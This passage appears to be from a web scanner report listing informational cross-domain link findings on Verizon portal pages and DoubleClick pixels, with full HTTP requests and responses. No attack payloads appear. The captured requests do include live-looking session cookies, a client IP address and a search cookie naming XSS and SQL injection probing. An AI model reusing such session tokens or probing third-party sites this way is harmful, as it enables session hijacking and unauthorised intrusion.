15.8. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_supportHelp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_supportHelp

Issue detail

The page was loaded from a URL containing a query string:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_supportHelp?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBProtal_portlet_hiddenNews_articleDetails_supportHelp&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&_portlet.title=How+can+we+help+you%3F&_nfsp=true

The response contains the following link to another domain:

http://www.verizonwireless.com/b2c/businessSolutions/contactUs.jsp

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_supportHelp?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBProtal_portlet_hiddenNews_articleDetails_supportHelp&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&_portlet.title=How+can+we+help+you%3F&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&newsId=48291&portletTitle=Small%20Business%20Expert%20Advice&FromHeroTab=article&Headline=Five%20Powerful%20Lists%20to%20Help%20You%20Take%20Command%20of%20Your%20Work%20Life
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269365057:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

15.9. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2

Issue detail

The page was loaded from a URL containing a query string:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=VerizonDiscountProgram_2&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Verizon+Discount+Program&_nfsp=true

The response contains the following links to other domains:

http://www.deluxelogodesign.com/verizon
https://pcnowverizon.webex.com/MyWebExWeb/MyWebexPortal.portal

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=VerizonDiscountProgram_2&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Verizon+Discount+Program&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

15.10. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10

Issue detail

The page was loaded from a URL containing a query string:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=portletInstance_10&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Quick+Links&_nfsp=true

The response contains the following link to another domain:

https://email.vzwshop.com/servlet/website/ResponseForm?OSPE8b6_vimpg_zf8_9httNgpmR

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=portletInstance_10&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Quick+Links&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

15.11. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11

Issue detail

The page was loaded from a URL containing a query string:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=portletInstance_11&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=How+can+we+help+you%3F&_nfsp=true

The response contains the following link to another domain:

http://www.verizonwireless.com/b2c/businessSolutions/contactUs.jsp

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=portletInstance_11&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=How+can+we+help+you%3F&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

15.12. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=invitemedia

The response contains the following link to another domain:

http://g-pixel.invitemedia.com/gmatcher?id=E1

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:16:11 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 242
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1">here</A>
...[SNIP]...

15.13. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=invitemedia

The response contains the following link to another domain:

http://g-pixel.invitemedia.com/gmatcher?id=CAESEDlps0WDQzL_sGCOCdezGYM&cver=1

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=CAESEDlps0WDQzL_sGCOCdezGYM&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:14:39 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 278
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=CAESEDlps0WDQzL_sGCOCdezGYM&cver=1">here</A>
...[SNIP]...

15.14. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1284649%26t%3D2

The response contains the following link to another domain:

http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1284649%26t%3D2

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1284649%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=fiost917;ord=789927707519.3822?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1284649%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:18:34 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 322
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1284649%26t%3D2">here</A>
...[SNIP]...

15.15. https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/default/signIn.do

Issue detail

The page was loaded from a URL containing a query string:

https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo

The response contains the following links to other domains:

https://b2b.verizonwireless.com/b2b/commerce/privacy.go?nav=ext
https://b2b.verizonwireless.com/tbmb/customer_information.do
https://b2b.verizonwireless.com/tbmb/legal_notices_nologin.do
https://b2b.verizonwireless.com/tbmb/terms_and_conditions_nologin.do
https://enterpriseportalcontent.mci.com/CC/public/AMER/general/default/en-US/termsconditions.html
https://enterpriseportalcontent.mci.com/CC/public/Login/en-US/Enroll.htm?pbpath=https://EnterpriseCenter.verizon.com
https://enterpriseportalcontent.mci.com/CC/public/Login/en-US/SpecialBuys.htm

Request

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Expires: Mon, 05 Sep 2011 22:25:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:37 GMT
Content-Length: 21907
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]...
<td valign="top" class="taskColAnon">
               <iframe title="Enroll" allowtransparency="true" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" id="enRollIframe" name="enRollIframe" onload="_resizeIframeToFit(this.id, true)" src='https://EnterprisePortalContent.mci.com/CC/public/Login/en-US/Enroll.htm?pbpath=https://EnterpriseCenter.verizon.com' width="239px" height="212px"> IFRAME supported needed to view contents!</iframe>
...[SNIP]...
<td valign="top" class="taskColAnon">
               <iframe title="Special Buys" allowtransparency="true" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" id="specialBuysIframe" name="specialBuysIframe" src='https://EnterprisePortalContent.mci.com/CC/public/Login/en-US/SpecialBuys.htm' width="239px" height="212px"> IFRAME supported needed to view contents!</iframe>
...[SNIP]...
</a>  |  
       <a href="https://EnterprisePortalContent.mci.com/CC/public/AMER/general/default/en-US/termsconditions.html" target="_self" >Terms & Conditions</a>
...[SNIP]...
<br>

   Verizon Wireless:

       <a href="https://b2b.verizonwireless.com/b2b/commerce/privacy.go?nav=ext" target="_self" >Privacy</a>  |  
       <a href="https://b2b.verizonwireless.com/tbmb/legal_notices_nologin.do" target="_self" >Legal Notices</a>  |  
       <a href="https://b2b.verizonwireless.com/tbmb/terms_and_conditions_nologin.do" target="_self" >Website Terms of Use</a>  |  

   <a href="https://b2b.verizonwireless.com/tbmb/customer_information.do" target="_self" >Customer Information Overview</a>
...[SNIP]...

15.16. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?

The response contains the following links to other domains:

http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js
http://idcs.interclick.com/Segment.aspx?sid=5d69f842-0719-4c5b-961b-9400c8d4e652
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=verizonlb_cs=1&betq=12605=431339
http://tap.tapad.com/audience/pxl.png?aud_id=4DSP41
https://12.xg4ken.com/media/redir.php?track=1&type=nav_home&val=0.0&token=&orderId= dynamic_value&promoCode=SEM&valueCurrency=USD&product=

Request

GET /activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366? HTTP/1.1
Host: fls.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 05 Sep 2011 22:14:36 GMT
Expires: Mon, 05 Sep 2011 22:14:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 963
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://idcs.interclick.com/Segment.aspx?sid=5d69f842-0719-4c5b-961b-9400c8d4e652"/><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=verizonlb_cs=1&betq=12605=431339" width = "1" height = "1" border = "0"><img src="https://12.xg4ken.com/media/redir.php?track=1&type=nav_home&val=0.0&token=&orderId= dynamic_value&promoCode=SEM&valueCurrency=USD&product=" width="1" height="1"><img src="http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=38640;sz=1x1;ord=1?"width="1" height="1" border="0" alt=""><div style="position:absolute;"><script src="http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js"></script></div><img width="1" height="1" src="http://tap.tapad.com/audience/pxl.png?aud_id=4DSP41"></body>
...[SNIP]...

15.17. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=fiost917;ord=789927707519.3822?

The response contains the following links to other domains:

http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js
http://segment-pixel.invitemedia.com/pixel?pixelID=58630&partnerID=51&clientID=1042&key=segment

Request

GET /activityi;src=2761768;type=consu459;cat=fiost917;ord=789927707519.3822? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 05 Sep 2011 22:18:32 GMT
Expires: Mon, 05 Sep 2011 22:18:32 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 615
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Segment Tag | A
...[SNIP]...
<div style="position:absolute;"><script src="http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js"></script></div><img src="http://segment-pixel.invitemedia.com/pixel?pixelID=58630&partnerID=51&clientID=1042&key=segment" width="1" height="1" /></body>
...[SNIP]...

15.18. http://forums.verizon.com/vrzn/restapi/vc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.verizon.com
Path:	/vrzn/restapi/vc/

Issue detail

The page was loaded from a URL containing a query string:

http://forums.verizon.com/vrzn/restapi/vc/?restapi.response_template=user_infobox&user_id=11375

The response contains the following link to another domain:

http://vrzn.i.lithium.com/t5/image/serverpage/avatar-name/environment-clouds/avatar-theme/legacyclassic/avatar-collection/environment/avatar-display-size/message

Request

GET /vrzn/restapi/vc/?restapi.response_template=user_infobox&user_id=11375 HTTP/1.1
Host: forums.verizon.com
Proxy-Connection: keep-alive
Referer: http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; 